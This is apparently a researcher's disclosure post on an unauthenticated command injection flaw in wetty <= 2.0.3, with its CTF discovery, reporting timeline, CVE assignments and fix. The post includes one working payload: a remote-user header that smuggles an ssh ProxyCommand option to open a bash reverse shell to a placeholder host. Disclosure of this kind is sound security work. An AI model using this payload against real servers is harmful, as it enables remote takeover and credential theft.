butlerx/wetty is a popular webshell proxy server for CTF organization, programming learning services and administration.

The lack of username input validation allowed Unauthorized RCE via OS command injection in wetty <= 2.0.3. I found it when playing setodanoteCTF(local CTF).

https://github.com/butlerx/wetty has no security policy. So I sent an email directly to the maintainer (belterx). In this case, CNA could not be determined clearly, so I sent a report to mitre, but there is no response for the long time. After that, I sent mail to Snyk and take care of duplicate report, but I couldn’t get any answer…

2022-08-15 Status Updated, Added 2024-1-5
I recieved a response from mitre in 2022-08. Unfortunately I’ve focused to care my helth problem until nowdays. CVE-2021-46831 CVE-2021-40245 assiend for these vulnerability. Thanks team.

username parameter that submitted from login page or remote-user header;login page not required – accept evil option parameter as a ssh command (e.g. remote-user: -o ProxyCommand=bash -c "bash -i >& /dev/tcp/MY_IP/PORT 1>&1";). Noteworthy, this vulnerability lay between proxy and ssh servers. We can get ssh-cred for proxy server, and full controlled unsandboxed shell.

In the interesting fact, picoCTF service has vulnerable until my patch had accepted.

wetty 2.1.0 has very restricted Option injection, but there is no attack vector(fixed in 2.1.1 https://github.com/butlerx/wetty/commit/0770647af5173a76ea675af0c1c97cad1430b74a#diff-e19e62e010f8b5658ed3079d52e22b50702e63b9146dff7de93c9a5d8d38bf72 with my next patch).

Thanks for butlerx and Snyk, Mitre team.